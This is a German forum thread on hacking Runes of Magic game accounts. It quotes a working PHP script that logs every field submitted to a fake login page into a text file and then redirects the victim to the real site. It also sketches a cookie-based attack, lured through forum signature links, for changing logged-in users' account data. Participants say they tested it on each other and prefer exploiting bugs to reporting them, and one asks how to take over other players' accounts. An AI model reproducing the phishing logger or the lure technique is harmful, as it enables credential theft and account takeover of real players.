ROM Account hacken

[wolleboiii]

jo.. kaum zu glauben aber wahr! ich bin irgendwie immer noch schockiert und mein kopf qualmt auch aber es klappt echt... echt mies !

[Digital Shadow]

Quote:

Originally Posted by Atheuz

Leider warst du dir nicht zu 1001% sicher, hatte es wolleboii auch nun genauer erklärt wieso das überhaupt geht.


Wo bleibt mein obligatorischer Kuchen?

Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?

Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.

Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.

[Deset]

Krieg ich dann auch nen kuchen wenn ichs erklär?

Quote:

Originally Posted by Digital Shadow

PHP Code:

<?php
header ('Location: http://www.runesofmagic.com');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

das ganze schreibt $variable und $value in das text dokument usernames.txt

wenn man die fwrite befehle anguckt und sie mit dem Skin der seite vergleicht kommt das raus

fwrite($handle, $variable); => Username
fwrite($handle, "="); => E-mail
fwrite($handle, $value); => Passwort
fwrite($handle, "\r\n"); => Land

nun wenn $variable und $value gespeichert werden speichert es den Eintrag vom Benutzernamen und vom Passwort



Kucheeeeeeen

[Viviphyd]

Kuchen kriegen nur die jenigen die, die Frage richtig beantworten ^^.

Das der angegebene PHP-Code bzw das Video ein Tutorial für eine einfache Write-Methode die Username, Pw und etc von einer gefälschten RoM-Seite speichert brauchst du keinem erklären, das dürften die meisten hier wissen

Die Frage oder besser die Forderung war, zu erklären wie bzw wieso es funktioniert das man mithilfe von Cookies die Benutzerdaten eines beliebigen (vorher eingeloggten) User umändern kann.

Erst dann gibs Kuchen ^^

[Atheuz]

Quote:

Originally Posted by Digital Shadow

Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?

Du bekommst dein Kuchen wenn du allen von uns erklären kannst wieso das überhaupt geht. Vorher solltest du den Ball flach halten.

Das was du wahrscheinlich meinst hat nichts direkt mit dem Thema/Video zu tun. In dem Video wird dargestellt wie man sich eine Phishing-Website bastelt bzw. ganz einfach mit erstellt und die Eingaben nach dem Drücken auf den "Submit"-Button in eine neu erstellte Textdatei schreibt. Danach wird man forwarded/weitergeleitet auf runesofmagic.com damit man denkt man hat das alles grad auf der offiziellen Runes of Magic Page gemacht.

Vielleicht hättest du mal dir auch die ersten Beiträge durchlesen können, was ich erklärt habe war kein Phising oder sonst was, sondern eine alternative Methode. Lesen Jungs.

[Deset]

Quote:

Originally Posted by Digital Shadow

Wo soll denn da bitte ein Cookieabfang/auslese stattfinden? Siehst du da irgendwas in dem PHP-Skript?

so wie ich das verstanden hab hat das nichts mit cookies zu tun...

wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten

[Viviphyd]

Quote:

Originally Posted by Deset

so wie ich das verstanden hab hat das nichts mit cookies zu tun...

wenn du die daten hast, kannst du dich auf der frogster seite einloggen und die daten ändern, so isset doch am einfachsten

Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.

Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.

Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein.

Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^

[Deset]

ich habe es zusammen mit ihm probiert und als versuchskaninchen fungiert und es hat geklappt ^^

[Atheuz]

Quote:

Originally Posted by Viviphyd

Mit einer Phising-Page die Daten zu ergattern ist einfach, wirklich effizient dafür nicht, immerhin ist ja nicht jeder so blöd und checkt nicht falls z.B. die URL ne falsche ist.

Hingegen die Idee mit den Cookies ist nahezu brilliant. Man könnte z.B. einfach einen Link in seine RoM-Foren Signatur reinpacken, die führt dich dann zu irgend ner Seite z.B. Gildenhp. Dazwischen hast du aber nen selbergebastelten forward der die Acc-Daten einfach in ein Vorgegebenes Schema alá User1;Pw1, User2;Pw2 etc umändert.

Die große Frage ist jetzt eben ob das so einwandfrei klappt, nach Atheuz ja, nach den meisten anderen nein. Die anderen wissen nichtmal um was es geht.

Ich persönlich würd mich über ne kleine Demonstration von Atheuz freuen falls er/sie es überhaupt hingekriegt hat. Dafür würds von mir nen extra großen Kuchen, geschmückt mit lauter kleinen Thx geben ^^

Endlich jemand der die Sache versteht, ja genau so könnte man das machen. Es funktioniert auch. Habs mit Deset und Wolleboii probiert.

Man müsste nur das ganze etwas verfeinern, das z.B anhand der IP ein eigener Benutzername mit PHP generiert wird und in einer Datenbank oder Textdatei gespeichert wird, oder das man lieber komplett Ajax verwendet. Ich schick dir das per PN.

[wolleboiii]

genau , so würde das dann funktionieren. Der einzige Nachteil ist das die Leute eingeloggt sein müssen bei der yusho seite und ingame nicht eingeloggt sein dürfen... ansonsten eine super ... naja eher ziemlich böse sache

aber es geht ja eh nur um die theorie

btw. morgen erstma *kaffee hebt*

[metinric]

danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^

[anonymous-f4h279]

Quote:

Originally Posted by metinric

danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^

Natürlich, ich bewerbe mich mal bei Frogster und sage ich helfe euch eure Server sicher zu machen.
So leicht wie du dir das vorstellst ist das nicht.

[Deset]

Quote:

Originally Posted by metinric

danke für die info mädels wieder was gelernt was macht ihr hauptberuflich ? wenn noch zeit danach wär dann helft dochmal frogster den server sicher zu machen.^^

wozu?

ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?

[anonymous-f4h279]

Quote:

Originally Posted by Deset

wozu?

ja ein Problem weniger, und für jeden Fehler der behoben wird, werden 2 neue gefunden, außerdem was bringt uns es, denen zu helfen?

Da stimme ich dir vollkommen zu.
Wir wollen Vorteile durch diese Bugs und sie nicht beheben lassen

[Emblionvirus]

Schön das ihr so GEIL auf RoM Acc Hack seit... mir wurde mein Account gestern gehackt... Alles ist weg komplett alles....

und ich will jetzt auch einen RoM Acc hacken,damit ich bessere Sachen habe,ich habe das alles was auf dem Video steht gemacht,jeden Schritt verfolgt... Was muss ich als nächstes machen,wenn ich auf der erstellten Homepage alles gesavet habe usw...?